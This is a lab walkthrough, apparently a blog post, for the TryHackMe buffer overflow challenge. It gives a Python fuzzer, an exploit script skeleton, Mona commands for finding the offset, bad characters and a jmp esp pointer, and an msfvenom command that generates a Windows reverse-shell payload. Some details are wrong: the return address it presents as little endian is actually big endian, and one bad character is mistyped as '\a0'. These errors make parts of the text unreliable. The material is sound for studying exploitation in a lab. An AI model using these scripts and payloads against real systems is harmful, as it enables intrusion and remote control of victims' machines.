We will be tackling the vulnerable application for the THM buffer overflow challenge level 1.

Configure Mona

Mona is a script that helps to automate and speed up specific searches during the exploit development process. It runs over immunity debugger and WinDBG. First we open up our immunity debugger, load the vulnerable application and pass the monda working folder command to immunity.

!mona config -set workingfolder c:\mona\%p

Crash the application

This is a standard fuzzing script, to connect to a remote application and test the input handling by that application.

#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.61.185"

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Start the vulnerable application in immunity debugger, in which it will be in a default state.

Execute the fuzzing script and wait for the application to crash.

Find the offset

The offset is the location in memory we can write to, once we overflow the buffer. We will use the skeleton of an exploit script to help us with this.

import socket

ip = "10.10.61.185"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

In order to find this offset, we will generate random characters and send these to the target application while running under immunity. We will then be able to call mona to grep the exact memory address of where this occurred, and we will see are random input there.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

Copy this into the payload variable of the script and run the exploit.py. This will send 2400 characters to the target server. (We have to always close and re-open the vulnerable application).

After sending this information, we know that the application has crashed and we want to see the values of the existing registers at the moment of the crash.

!mona findmsp -distance 2400

EIP = 1978

Great we update our offset value in the exploit to 1978 and the return address to BBBB. What should happen is the exploit will send the offset * A and pad BBBB at the end of the offset to overwrite the return address which is pointed to by EIP after the buffer. as it BBBB will be directly next to the buffer in memory.,

Control EIP

Here we see that our BBBB are in the EIP register and we now control EIP which will determine the next set of instructions after the buffer is read into memory. We can now point the EIP to our chosen address,

Bad characters

As someone who worked largely in binary exploitation in linux, I find switching over to windows quite different. But one big thing we have to do is identify bad characters that are not accepted by the server, so we can exclude these from our shellcode which we will generate next.

!mona bytearray -b "\x00"

This will generate the whole array of characters in mona in the mona temp working folder, which we will later use to compare characters and find bad chars.

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()

\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

With the array of characters generated we can input this into our payload and from here we re run the vulnerable application and the exploit. Now we need to record the address that ESP is pointing to.

ESP=019CFA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 019CFA30

The stack pointer will let us know which characters in cannot process from those saved to bytearray when we pass them through our exploit to the ESP which is right next to EIP.

We will now need to remove these one at a time, and confirm no bad characters remain.

We do this with the following steps.

1. Remove characters from the byte array in mona

2. Remove characters from exploit payload in python

3. Restart the vulnerable application.exe and run

4. Send exploit with modified payload

5. Compare using mona compare function

!mona bytearray -b "\x00\x07"

Now we remove the 07 from the exploit payload and launch the exploit.

We then run the comparison function again and confirm our bad char has been removed.

Now we repeat this process until there are no more bad chars.

Eventually we will get this feedback,

Find a jump point

Now we need to find a valid address for the "jmp esp" which will be called after our eip finishes passing its commands. This will effectively allow us to point the return address to our shellcode.

!mona jmp -r esp -cpb "\x00"

0x625011af is our pointer address and we convert this to little endian.

\x62\x50\x11\xaf is the proper format for the return address in our exploit.

Great lets add this to the return address in our script to replace the BBBB.

Payload generation

Now we generate the payload with msfvencom and call all our bad characters.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.175.76 LPORT=4444 EXITFUNC=thread -b "\x00\x07\x2e\a0" -f c

Copy and paste the now bad char free shell code in to the payload field with curlies like this.

payload = ("code")

Prepend NOPS

The payload will need room to unpack itself so we will call padding for no operations.

padding = "\x90" * 16